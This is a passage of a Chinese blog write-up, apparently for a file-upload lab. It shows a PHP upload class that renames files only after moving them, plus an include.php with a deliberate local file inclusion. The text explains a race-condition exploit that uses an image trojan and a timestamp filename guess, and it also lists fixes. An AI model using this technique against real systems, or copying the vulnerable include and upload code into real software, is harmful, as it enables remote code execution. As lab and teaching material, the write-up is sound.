class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">require_once</span>(<span class="string">"./myupload.php"</span>);</span><br><span class="line"> <span class="variable">$imgFileName</span> =time();</span><br><span class="line"> <span class="variable">$u</span> = <span class="keyword">new</span> MyUpload(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>], <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'size'</span>],<span class="variable">$imgFileName</span>);</span><br><span class="line"> <span class="variable">$status_code</span> = <span class="variable">$u</span>->upload(UPLOAD_PATH);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$status_code</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$img_path</span> = <span class="variable">$u</span>->cls_upload_dir . 
<span class="variable">$u</span>->cls_file_rename_to;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'文件已经被上传,但没有重命名。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">1</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'这个文件不能上传到服务器的临时文件存储目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">2</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传目录不可写。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">3</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,无法上传该类型文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">4</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,上传的文件过大。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">5</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传失败,服务器已经存在相同名称文件。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> -<span class="number">6</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span 
class="string">'文件无法上传,文件不能复制到目标目录。'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'未知错误!'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">//myupload.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyUpload</span></span>{</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line"> <span class="keyword">var</span> <span class="variable">$cls_arr_ext_accepted</span> = <span class="keyword">array</span>(</span><br><span class="line"> <span class="string">".doc"</span>, <span class="string">".xls"</span>, <span class="string">".txt"</span>, <span class="string">".pdf"</span>, <span class="string">".gif"</span>, <span class="string">".jpg"</span>, <span class="string">".zip"</span>, <span class="string">".rar"</span>, <span class="string">".7z"</span>,<span class="string">".ppt"</span>,</span><br><span class="line"> <span class="string">".html"</span>, <span class="string">".xml"</span>, <span class="string">".tiff"</span>, <span class="string">".jpeg"</span>, <span class="string">".png"</span> );</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... 
</span><br><span class="line"> <span class="comment">/** upload()</span></span><br><span class="line"><span class="comment"> **</span></span><br><span class="line"><span class="comment"> ** Method to upload the file.</span></span><br><span class="line"><span class="comment"> ** This is the only method to call outside the class.</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@para</span> String name of directory we upload to</span></span><br><span class="line"><span class="comment"> ** <span class="doctag">@returns</span> void</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"> <span class="variable">$dir</span> </span>)</span>{</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->isUploadedFile();</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->setDir( <span class="variable">$dir</span> );</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span 
class="keyword">$this</span>->checkExtension();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->checkSize();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if flag to check if the file exists is set to 1</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>( <span class="keyword">$this</span>->cls_file_exists == <span class="number">1</span> ){</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->checkFileExists();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// if we are here, we are ready to move the file to destination</span></span><br><span class="line"></span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->move();</span><br><span class="line"> <span 
class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// check if we need to rename the file</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>( <span class="keyword">$this</span>->cls_rename_file == <span class="number">1</span> ){</span><br><span class="line"> <span class="variable">$ret</span> = <span class="keyword">$this</span>->renameFile();</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$ret</span> != <span class="number">1</span> ){</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="variable">$ret</span> ); </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// if we are here, everything worked as planned :)</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">$this</span>->resultUpload( <span class="string">"SUCCESS"</span> );</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line">......</span><br><span class="line">......</span><br><span class="line">...... </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p><strong>绕过方法</strong></p>
<p>上传一个后缀在白名单内的图片马(例如 <code>xxx.jpg</code>,内容带 PHP 代码),同时用多线程不断请求 <code>include.php?file=upload/xxx.jpg</code>。由于文件先以原名 <code>move()</code> 到上传目录、之后才 <code>renameFile()</code>,在这两步之间存在一个时间窗口,只要有一次请求赶在改名之前命中,图片马就会被包含执行。注意这里"竞争"的是改名而不是删除:从可见代码看,改名后文件仍留在服务器上,只是名字变了。</p>
<p>竞争成功时不需要知道改名后的新文件名,直接包含原名即可。另外,<code>index.php</code> 把 <code>time()</code> 作为第四个参数传给 <code>MyUpload</code>,成功后拼出的路径是 <code>cls_upload_dir . cls_file_rename_to</code>,可以推测(具体拼接规则在被省略的代码里)新文件名由上传时刻的 Unix 时间戳决定,精确到秒;攻击者只要记下上传时间,就能在很小的范围内枚举出新文件名,这时连竞争都可以省掉。</p>
<p>需要说明的是,白名单本身在这里是起作用的:落盘文件始终带 <code>.jpg</code> 之类的后缀,直接访问不会被当作 PHP 执行。图片马能跑起来,依赖的是另一个独立缺陷——下面的 <code>include.php</code> 直接 <code>include $_GET['file']</code>,路径完全由用户控制(本地文件包含)。没有这个包含点,条件竞争本身拿不到代码执行。另外,白名单放行了 <code>.html</code>,上传的 HTML 会在站点域下被直接渲染,这是一个存储型 XSS 入口,与竞争无关但同样应去掉。</p><p>修复要点:先生成随机的、与用户输入无关的目标文件名,再用 <code>move_uploaded_file()</code> 一步移动到最终路径,不留"先原名落盘再改名"的窗口;上传目录放到 web 根之外或关闭脚本解析(这只能防直接访问,对文件包含无效,所以包含点也必须修);<code>include</code> 的参数只允许来自固定映射表,不接受用户传入的路径。</p>
<p>include.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">本页面存在文件包含漏洞,用于测试图片马是否能正常运行!</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">header(<span class="string">"Content-Type:text/html;charset=utf-8"</span>);</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>)){</span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> show_source(<span class="keyword">__file__</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/include.php?file=upload/xxx.jpg</span><br></pre></td></tr></table></figure><button type="button" class="tab-to-top" aria-label="scroll to top"><i class="fas fa-arrow-up"></i></button></div></div></div>